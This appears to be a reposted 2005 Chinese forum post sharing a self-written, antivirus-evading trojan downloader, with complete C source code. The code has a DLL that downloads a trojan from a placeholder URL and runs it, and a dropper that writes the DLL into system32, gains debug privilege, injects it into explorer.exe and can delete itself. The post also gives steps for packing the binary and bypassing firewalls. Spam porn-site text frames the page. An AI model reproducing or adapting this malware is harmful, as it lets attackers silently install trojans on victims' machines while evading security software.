久久精品国产欧美日韩99热,国产亚洲日本

自寫的downloader代碼，免殺哦！

2005.11.07

自寫的downloader代碼，免殺哦！[原創(chuàng)]

看見大家都是到處發(fā)表教程，一時也心癢！我呢，不學無術(shù)，哪里寫錯的地方請原諒！
首先的我的代碼是網(wǎng)上的，我自是平湊一下，在這里感謝原作者。
downloader網(wǎng)上也公布很多，但是大都是被kill了，這種常用的小工具最好自己編，才好免殺。
思路，運用一個dll插入線程，這樣就可以傳墻了。（呵呵）
步驟：
先寫個dll，這個我用lcc編寫：
//////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <urlmon.h>
DWORD WINAPI DLLDownMain (LPVOID lpNot);
char DownURL[100] = {"換成木馬的地址"};
char PathAndFileName[100] = {"tnt.exe"};
BOOL WINAPI __declspec(dllexport) LibMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)
{
DWORD ThreadID=0;
HANDLE hThread=NULL;
switch (fdwReason)
{
      case DLL_PROCESS_ATTACH:
hThread=CreateThread(NULL,0,DLLDownMain,NULL,0,&ThreadID);
   if (hThread==NULL)break;
         // The DLL is being loaded for the first time by a given process.
         // Perform per-process initialization here.  If the initialization
         // is successful, return TRUE; if unsuccessful, return FALSE.

         break;
      case DLL_PROCESS_DETACH:
         // The DLL is being unloaded by a given process.  Do any
         // per-process clean up here, such as undoing what was done in
         // DLL_PROCESS_ATTACH.  The return value is ignored.

         break;
      case DLL_THREAD_ATTACH:
         // A thread is being created in a process that has already loaded
         // this DLL.  Perform any per-thread initialization here.  The
         // return value is ignored.

         break;
      case DLL_THREAD_DETACH:
         // A thread is exiting cleanly in a process that has already
         // loaded this DLL.  Perform any per-thread clean up here.  The
         // return value is ignored.

         break;
}
return TRUE;
}
DWORD WINAPI DLLDownMain (LPVOID lpNot)
{
  char *pDownURL = NULL;
  char *pPathAndFileName = NULL;

  pDownURL = DownURL;
  pPathAndFileName =PathAndFileName;

  if (URLDownloadToFile(0, pDownURL,PathAndFileName, 0, 0) == S_OK)
  {

   WinExec(PathAndFileName, SW_SHOW);
  }

return 0;
}
///////////////////////////////////////////////////////////////////////////////
lcc編譯完，大小是5k左右！
然后把這個dll用exe2hex工具轉(zhuǎn)換成十六進制的文本。
編寫downloader的主體，我用vc編寫：

/////////////////////////////////////////////////////////////////////////////////
#include "stdafx.h"
#include<windows.h>
#include<stdio.h>
#include <psapi.h>
#include <shlobj.h>
#include <SHELLAPI.H>
#include <dll.h>

#pragma comment(lib,"psapi.lib")
#pragma comment(lib,"msvcrt.lib")

#pragma comment(linker, "/SECTION:.text,REW")
#pragma comment(linker, "/MERGE:.data=.text")
#pragma comment(linker, "/MERGE:.rdata=.text")

int InjectDll(const char *FullName, const DWORD Pid);
DWORD ProcessToPID(const char *ProcessName, DWORD aPid[1024]);
int AddPrivilege(const char *Name);
BOOL SelfDelete(void);

int APIENTRY WinMain(HINSTANCE hInstance,
                  HINSTANCE hPrevInstance,
                  LPSTR    lpCmdLine,
                  int    nCmdShow)
{
// TODO: Place code here.
char achAim[MAX_PATH + 1];
const char *pszLibFileName = "windll.dll";//dll的文件名
const char DESTPROC[19] = "EXPLORER.EXE";//注入的進程名

GetSystemDirectory(achAim, sizeof(achAim));
strcat(achAim,"\\");
strcat(achAim,pszLibFileName);

FILE *fp;
if ((fp = fopen(achAim, "wb")) != NULL)
{
fwrite(Dll_Data, sizeof(Dll_Data), 1, fp);
fclose(fp);
}else{
return 0;
}
//
DWORD Pid;
if ((Pid = ProcessToPID(DESTPROC, NULL)) != 0)
{
InjectDll(achAim, Pid);

   }
//SelfDelete();////想要主體程序自我刪除功能請去掉前邊的斜杠。
return 0;
}
int InjectDll(const char *FullName, const DWORD Pid)
{
HANDLE hRemoteProcess;

//如果是要打開系統(tǒng)進程，一定要先申請debug權(quán)限
AddPrivilege(SE_DEBUG_NAME);

if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許遠程創(chuàng)建線程
      PROCESS_VM_OPERATION | //允許遠程VM操作
      PROCESS_VM_WRITE |  //允許遠程VM寫
      PROCESS_VM_READ, //允許遠程VM讀
      0,
      Pid)) == NULL)
{
      return 1;
}
char *pDllName;

if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,
      NULL,
      lstrlen(FullName) + 1,
      MEM_COMMIT,
      PAGE_READWRITE)) == NULL)
{

      return 1;
}

//使用WriteProcessMemory函數(shù)將DLL的路徑名復制到遠程進程的內(nèi)存空間
if (WriteProcessMemory(hRemoteProcess,
      pDllName,
      (void *)FullName,
      lstrlen(FullName),
      NULL) == 0)
{

      return 1;
}

//計算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr;

if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
      GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
{

      return 1;
}

HANDLE hRemoteThread;
DWORD ThreadId;

if ((hRemoteThread = CreateRemoteThread(hRemoteProcess, //被嵌入的遠程進程
      NULL,
      0,
      pfnStartAddr,  //LoadLibraryA的入口地址
      pDllName,
      0,
      &ThreadId)) == NULL)
{
      return 1;
}

return 0;
}
DWORD ProcessToPID(const char *ProcessName, DWORD aPid[1024])
{

typedef BOOL (CALLBACK* EnumProcessesType)(DWORD *,DWORD,DWORD *);
typedef BOOL (CALLBACK* EnumProcessModulesType)(HANDLE,HMODULE *,DWORD,LPDWORD);
typedef DWORD (CALLBACK* GetModuleBaseNameType)(HANDLE, HMODULE, LPTSTR, DWORD);

EnumProcessesType EnumProcesses;
EnumProcessModulesType EnumProcessModules;
GetModuleBaseNameType GetModuleBaseName;

HMODULE hmPsapi = GetModuleHandle("psapi.dll");
if (hmPsapi == NULL)
{
      if ((hmPsapi = LoadLibrary("psapi.dll")) == NULL)
      {
         return 0;
      }
}
EnumProcesses = (EnumProcessesType)GetProcAddress(hmPsapi, "EnumProcesses");
EnumProcessModules = (EnumProcessModulesType)GetProcAddress(hmPsapi, "EnumProcessModules");
GetModuleBaseName = (GetModuleBaseNameType)GetProcAddress(hmPsapi, "GetModuleBaseNameA");

if (!(EnumProcesses &&
         EnumProcessModules &&
         GetModuleBaseName))
{
      FreeLibrary(hmPsapi);

      #ifdef _DEBUG
         printf("GetProcAddress() error : %d\n", GetLastError());
      #endif
      return 0;
}

DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i , j;
HANDLE hProcess;
HMODULE hMod;
char szProcessName[MAX_PATH] = "UnknownProcess";

// 計算目前有多少進程, aProcesses[]用來存放有效的進程PID
if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
{
      #ifdef _DEBUG
         printf("EnumProcesses() error : %d\n", GetLastError());
      #endif

      FreeLibrary(hmPsapi);
      return 0;
}

cProcesses = cbNeeded / sizeof(DWORD);

// 按有效的PID遍歷所有的進程
for ( i = 0, j = 0; i < cProcesses; i++ )
{
      // 打開特定PID的進程
      hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
                              PROCESS_VM_READ,
                              FALSE,
                              aProcesses[i]);
      // 取得特定PID的進程名
      if ( hProcess )
      {
         if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
         {
            GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName));

            //將取得的進程名與輸入的進程名比較，如相同則返回進程PID
            if(!stricmp(szProcessName, ProcessName))
            {
                  CloseHandle( hProcess );

                  //如果接收緩沖區(qū)有效，就依次填入pid，否則立即返回
                  if (aPid != NULL)
                  {
                     aPid[j++] = aProcesses[i];
                  }
                  else
                  {
                     FreeLibrary(hmPsapi);

                     return aProcesses[i];
                  }

            }
         }
      }
}

CloseHandle( hProcess );

if (aPid != NULL)
{
      FreeLibrary(hmPsapi);

      return aPid[0];
}

FreeLibrary(hmPsapi);
return 0;
}
int AddPrivilege(const char *Name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID Luid;

if (!OpenProcessToken(GetCurrentProcess(),
      TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
      &hToken))
{
      return 1;
}

if (!LookupPrivilegeValue(NULL,Name,&Luid))
{
      return 1;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = Luid;

if (!AdjustTokenPrivileges(hToken,
      0,
      &tp,
      sizeof(TOKEN_PRIVILEGES),
      NULL,
      NULL))
{
      return 1;
}

return 0;
}

BOOL SelfDelete(void)
{
SHELLEXECUTEINFO sei;

TCHAR szModule [MAX_PATH],
      szComspec[MAX_PATH],
      szParams [MAX_PATH];

// get file path names
if((GetModuleFileName(0,szModule,MAX_PATH)!=0) &&
         (GetShortPathName(szModule,szModule,MAX_PATH)!=0) &&
         (GetEnvironmentVariable("COMSPEC",szComspec,MAX_PATH)!=0))
{
      // create comspec parameters
      lstrcpy(szParams,"/c del "); // run a single command to...
      lstrcat(szParams, szModule); // del(ete) module file and...
      lstrcat(szParams, " > nul"); // output results to nowhere

      // set struct members
      sei.cbSize = sizeof(sei);
      sei.hwnd = 0;
      sei.lpVerb = "Open";
      sei.lpFile= szComspec;
      sei.lpParameters = szParams;
      sei.lpDirectory = 0;
      sei.nShow = SW_HIDE;
      sei.fMask = SEE_MASK_NOCLOSEPROCESS;

      // give all CPU cycles to current process
      SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
      SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL);

      // execute command shell
      if(ShellExecuteEx(&sei))
      {
         // freeze command shell process
         SetPriorityClass(sei.hProcess,IDLE_PRIORITY_CLASS);
         SetProcessPriorityBoost(sei.hProcess,TRUE);

         // notify explorer shell of deletion
         SHChangeNotify(SHCNE_DELETE,SHCNF_PATH,szModule,0);
         return TRUE;
      }
      else
      {
         // otherwise, restore normal priority
         SetPriorityClass(GetCurrentProcess(),NORMAL_PRIORITY_CLASS);
         SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_NORMAL);
      }
}
return FALSE;
}
//////////////////////////////////////////////////////////////////////////////////
這里的<dll.h>的頭文件就是上邊的dll十六進制的文本，把他放在一個Dll_Data的數(shù)組內(nèi)，這樣編譯會有“4 warning”，可以不必理會，大小約16k，然后再用
WinUpack.exe壓縮，最后生成的文件大小是4k左右!
這個exe運行后會在system32目錄下生成一個windll.dll(可以改)的文件，同時把dll文件插入線程，如果系統(tǒng)下已經(jīng)有windll.dll文件，就自動退出，避免重復種木馬。
呵呵，我的語文水平不高，有什么不理解的地方到pcshare官方交流群里提問吧！

本站僅提供存儲服務，所有內(nèi)容均由用戶發(fā)布，如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請點擊舉報。

打開APP，閱讀全文并永久保存查看更多類似文章

【Hook技術(shù)】實現(xiàn)從"任務管理器"中保護進程不被關(guān)閉 + 附帶源碼 + 進程保護知識擴展

API HOOK之注冊表簡單監(jiān)控

嵌入式開發(fā)：基于Visual Studio的*.dll文件生成，不求人

根據(jù)GUID和PID和USB設(shè)備通信的方法

VC通過HTTP方式獲取網(wǎng)頁

關(guān)于鉤子函數(shù)的講解

更多類似文章 >>

免费视频淫片aa毛片_日韩高清在线亚洲专区vr_日韩大片免费观看视频播放_亚洲欧美国产精品完整版